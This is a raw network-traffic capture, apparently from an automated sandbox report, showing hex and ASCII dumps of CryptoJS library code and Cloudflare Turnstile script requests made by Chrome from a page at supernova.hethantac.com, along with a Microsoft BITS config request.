                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f
                                                                                                                                          Data Ascii: d"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=O
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 3d 6f 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61
                                                                                                                                          Data Ascii: =o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.ra
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61
                                                                                                                                          Data Ascii: ring"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(va
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 20 4e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e
                                                                                                                                          Data Ascii: N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30
                                                                                                                                          Data Ascii: >>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74
                                                                                                                                          Data Ascii: y(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={st
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47
                                                                                                                                          Data Ascii: var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFG
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d
                                                                                                                                          Data Ascii: 96*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}
                                                                                                                                          2024-11-18 05:47:24 UTC1369INData Raw: 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d
                                                                                                                                          Data Ascii: ,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.1655119104.18.95.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:24 UTC655OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://supernova.hethantac.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:24 UTC386INHTTP/1.1 302 Found
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:24 GMT
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          location: /turnstile/v0/b/22755d9a86c9/api.js
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa6638a76b8f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.1649712184.28.90.27443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:24 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                          2024-11-18 05:47:24 UTC467INHTTP/1.1 200 OK
                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          Server: ECAcc (lpl/EF4C)
                                                                                                                                          X-CID: 11
                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                          Cache-Control: public, max-age=212280
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:24 GMT
                                                                                                                                          Connection: close
                                                                                                                                          X-CID: 2


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.1655122104.18.95.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:25 UTC654OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://supernova.hethantac.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:25 UTC471INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:25 GMT
                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                          Content-Length: 47672
                                                                                                                                          Connection: close
                                                                                                                                          accept-ranges: bytes
                                                                                                                                          last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                          access-control-allow-origin: *
                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa6b08d4e702-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                                          Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,l=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 66 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 66 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 66 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 66 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 66 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 66 3d 5b 66 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                                                                          Data Ascii: ])}}function u(f){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,f[0]&&(n=0)),n;)try{if(o=1,c&&(l=f[0]&2?c.return:f[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,f[1])).done)return l;switch(c=0,l&&(f=[f[0]&2,l.val
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e
                                                                                                                                          Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVIN
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22
                                                                                                                                          Data Ascii: S_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){return M(["auto","dark"
                                                                                                                                          2024-11-18 05:47:25 UTC1369INData Raw: 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 50 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 72 72 3d 38 65 33 2c
                                                                                                                                          Data Ascii: ekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",P="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recaptcha-response",rr=8e3,
